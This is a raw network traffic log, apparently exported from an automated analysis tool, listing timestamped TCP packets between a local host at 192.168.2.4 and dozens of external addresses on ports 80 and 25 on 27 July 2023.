                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.864144087 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.864845991 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.864892006 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.864912987 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.864933014 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.864949942 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.864953995 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.864990950 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.865055084 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.865820885 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.865849018 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.865869999 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.865900993 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.865921974 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.865936995 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.866002083 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.866745949 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.866827011 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.866952896 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.866972923 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.866993904 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.867013931 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.867033958 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.867052078 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.867130995 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.867918968 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.867944956 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.867970943 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.867996931 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.868021011 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.868067026 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.868112087 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.868875980 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.868911982 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.868941069 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.868967056 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.868990898 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.869045973 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.869108915 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.869864941 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.869891882 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.869918108 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.869935989 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.869945049 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.869968891 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.869997978 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.870071888 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.971599102 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972040892 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972065926 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972094059 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972115040 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972136974 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972321033 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972356081 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972524881 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972547054 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972587109 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972626925 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972865105 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972888947 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972909927 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972929001 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972948074 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972949982 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.972975969 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.973015070 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.973743916 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.973771095 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.973790884 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.973810911 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.973829985 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.973840952 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.973896980 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.974615097 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.974642038 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.974663019 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.974683046 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.974704027 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.974740982 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.974757910 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.975527048 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.975548983 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.975569010 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.975598097 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.975620031 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.975634098 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.975640059 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.975670099 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.975702047 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.976511955 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.976533890 CEST8049844104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.978296041 CEST4984480192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.986891031 CEST4980325192.168.2.466.226.70.66
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.002784014 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.002836943 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.002857924 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.002878904 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.002898932 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.002921104 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.003029108 CEST4983380192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.003084898 CEST4983380192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.039068937 CEST4985280192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.039720058 CEST4985380192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.042800903 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.044207096 CEST4985580192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.049479961 CEST4985680192.168.2.4137.118.26.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.056583881 CEST4985780192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.057970047 CEST4985880192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.061338902 CEST4985980192.168.2.4104.21.23.9
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.074172020 CEST8049858188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.074316025 CEST4985880192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.074430943 CEST4986080192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.074785948 CEST4985880192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.075331926 CEST8049857192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.075416088 CEST4985780192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.075793982 CEST4985780192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.077441931 CEST8049859104.21.23.9192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.077680111 CEST4985980192.168.2.4104.21.23.9
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.078083992 CEST4985980192.168.2.4104.21.23.9
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.091221094 CEST8049858188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.094168901 CEST8049859104.21.23.9192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.094377041 CEST8049857192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.094866037 CEST8049857192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.095110893 CEST4985780192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.104130030 CEST8049859104.21.23.9192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.104212046 CEST4985980192.168.2.4104.21.23.9
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.107944012 CEST804986080.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.109965086 CEST4986080192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.122570038 CEST254980366.226.70.66192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.124130964 CEST254980366.226.70.66192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.124166012 CEST254980366.226.70.66192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.124258041 CEST4980325192.168.2.466.226.70.66
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.124324083 CEST4980325192.168.2.466.226.70.66
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.142733097 CEST804985270.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.142838955 CEST4985280192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.150356054 CEST4985080192.168.2.413.224.103.91
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.150392056 CEST4986080192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.150751114 CEST4984880192.168.2.43.65.101.129
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.160834074 CEST804985013.224.103.91192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.161735058 CEST804985013.224.103.91192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.161827087 CEST4985080192.168.2.413.224.103.91
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.170576096 CEST80498483.65.101.129192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.170774937 CEST4984880192.168.2.43.65.101.129
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.174933910 CEST8049858188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.175200939 CEST4985880192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.184073925 CEST804986080.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.184165001 CEST4986080192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.250745058 CEST804980862.122.190.121192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.252430916 CEST4980880192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.272933960 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.272989035 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.273029089 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.273066998 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.273106098 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.273155928 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.273169994 CEST4983380192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.273215055 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.273231983 CEST4983380192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.273263931 CEST4983380192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.300465107 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.300818920 CEST4985380192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.304429054 CEST8049855206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.304711103 CEST4985580192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.310203075 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.310350895 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.452394962 CEST4985780192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.452600002 CEST4985280192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.453568935 CEST4985380192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.453927994 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.454072952 CEST4985580192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.457449913 CEST4986080192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.457540989 CEST4985880192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.457623959 CEST4986180192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.471631050 CEST8049857192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.472747087 CEST4985780192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.477929115 CEST8049858188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.491132975 CEST804986080.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.491278887 CEST4986080192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.514122009 CEST804980862.122.190.121192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.514238119 CEST4980880192.168.2.462.122.190.121
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.554080009 CEST8049858188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.554343939 CEST4985880192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.556330919 CEST804985270.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.557172060 CEST804985270.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.557316065 CEST4985280192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.597234011 CEST804986152.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.597338915 CEST4986180192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.642641068 CEST4986180192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.642712116 CEST4985280192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.659775019 CEST4986280192.168.2.423.227.38.74
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.676084042 CEST804986223.227.38.74192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.676191092 CEST4986280192.168.2.423.227.38.74
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.692377090 CEST4986280192.168.2.423.227.38.74
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.693542957 CEST4986380192.168.2.4195.78.66.50
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.708584070 CEST804986223.227.38.74192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.712096930 CEST4986480192.168.2.4193.166.255.171
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.714097023 CEST8049855206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.714231014 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.714277029 CEST8049855206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.714294910 CEST8049855206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.714826107 CEST4985580192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718415022 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718441010 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718461990 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718501091 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718522072 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718542099 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718561888 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718575001 CEST4985380192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718583107 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718609095 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718636036 CEST8049853118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718650103 CEST4985380192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718650103 CEST4985380192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718664885 CEST4985380192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718816996 CEST4985380192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.718837023 CEST4986580192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.720252037 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721062899 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721086025 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721107006 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721127987 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721148014 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721169949 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721188068 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721194983 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721219063 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721226931 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721249104 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721256971 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721271038 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721283913 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721293926 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721311092 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721348047 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.721385002 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.733310938 CEST804986534.149.87.45192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.733483076 CEST4986580192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.745181084 CEST4986680192.168.2.4198.100.146.220
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.748428106 CEST804985270.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.748502016 CEST4985280192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.781361103 CEST804986152.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.781397104 CEST804986152.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.781447887 CEST4986180192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.781475067 CEST4986180192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.806240082 CEST804983339.99.233.155192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.806322098 CEST4983380192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.827914000 CEST4986180192.168.2.452.86.6.113
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.829782009 CEST4986780192.168.2.469.163.218.51
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.840718031 CEST4983580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.857963085 CEST4986880192.168.2.472.251.233.245
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.861881971 CEST804986223.227.38.74192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.861985922 CEST4986280192.168.2.423.227.38.74
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.876461029 CEST4986580192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.888287067 CEST4985580192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.891113043 CEST804986534.149.87.45192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.929773092 CEST804986534.149.87.45192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.930161953 CEST4986580192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.945229053 CEST4986980192.168.2.4103.224.182.241
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.963543892 CEST804983596.127.180.42192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.963881969 CEST4983580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.964107037 CEST4983580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.970772028 CEST804986152.86.6.113192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.979384899 CEST8049853118.27.125.181192.168.2.4
